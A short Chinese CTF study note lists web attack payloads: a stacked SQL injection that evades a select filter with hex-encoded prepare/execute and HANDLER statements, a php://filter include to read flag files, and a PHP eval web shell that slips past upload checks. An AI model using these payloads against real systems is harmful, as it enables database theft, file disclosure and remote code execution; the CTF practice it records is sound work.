学习小结8.25

1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用

';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+

或者

';handler 表名 open as a;handler a read next;--+

2.文件包含中的文件隐藏的flag,使用伪协议做包含

php://filter/convert.base64-encode/resource=文件名

3.文件上传对于<?的检测

可以使用<script language="php">eval($_POST['a'])</script>绕过

相关推荐
南猿北者27 分钟前
Cmake学习笔记
笔记·学习·策略模式
diablobaal1 小时前
云计算学习100天-第26天
学习·云计算
测试老哥2 小时前
pytest+requests+allure自动化测试接入Jenkins学习
自动化测试·软件测试·学习·测试工具·职场和发展·jenkins·pytest
diablobaal6 小时前
云计算学习100天-第21天
学习
好望角雾眠17 小时前
第一阶段C#基础-10:集合(Arraylist,list,Dictionary等)
笔记·学习·c#
艾伦~耶格尔17 小时前
【集合框架LinkedList底层添加元素机制】
java·开发语言·学习·面试
星仔编程17 小时前
python学习DAY46打卡
学习
大霞上仙18 小时前
实现自学习系统,输入excel文件,能学习后进行相应回答
python·学习·excel
yatingliu201920 小时前
HiveQL | 个人学习笔记
hive·笔记·sql·学习
武当豆豆20 小时前
C++编程学习(第25天)
开发语言·c++·学习